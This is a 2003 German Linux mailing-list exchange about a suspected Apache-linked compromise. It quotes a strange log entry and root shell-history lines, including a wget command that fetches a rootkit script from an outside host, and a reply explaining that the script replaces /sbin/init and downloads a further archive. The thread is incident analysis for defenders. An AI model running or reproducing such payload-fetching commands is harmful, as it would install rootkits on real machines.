Apache Bug?

[Jan-Benedict Glaw]

On Wed, 2003-05-28 14:05:49 +0200, Markus Wigge <markus at cultcom.de>
wrote in message <3ED4A61D.5060001 at cultcom.de>:
> Tag,
> 
> gibt es einen neuen Apache-Bug der root-Exploits ermöglicht?
> Ein Bekannter hat folgende Einträge im Log gefunden:
> a.b.c.d - - [26/May/2003:20:06:31 +0200] "T¡¬ôG^~Fgí±D1Mj×}äù<G<" 501 -
> 
> IP mal aus Datenschutzgründen geändert...
> 
> Er benutzt zur Zeit aktuelle Releases und hat ähnliche Zeilen auf 
> mehreren Rechnern gefunden und in der .bash_history von root ungefähr 
> folgende Zeilen die auf die Installation eines Root-Kit hindeuten:
> wget jhony.home.ro/aha

Hast Du das mal per Hand gemacht? Das läd ein shell script herunter, daß
nachfologend Deinen /sbin/init nach /sbin/init.aha kopiert und ein
bitgebrachtes binary als /sbin/init installiert. Danach wird noch
djcc.go.ro/goodies.tgz heruntergeladen und vermutlich von dem "init"
ausgepackt...

Naja, wenigstens kann man anscheinend recht leicht erkennen, ob man
befallen ist und das System anschließend wieder recovern. Ob man das
danach noch _benutzen_ möchte, ist eine andere Frage...

> ftp ftp.home.ro

MfG, JBG

-- 
   Jan-Benedict Glaw       jbglaw at lug-owl.de    . +49-172-7608481
   "Eine Freie Meinung in  einem Freien Kopf    | Gegen Zensur | Gegen Krieg
    fuer einen Freien Staat voll Freier Bürger" | im Internet! |   im Irak!
      ret = do_actions((curr | FREE_SPEECH) & ~(IRAQ_WAR_2 | DRM | TCPA));
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
URL: <http://lug-owl.de/pipermail/linux/attachments/20030528/f3e7d202/attachment.sig>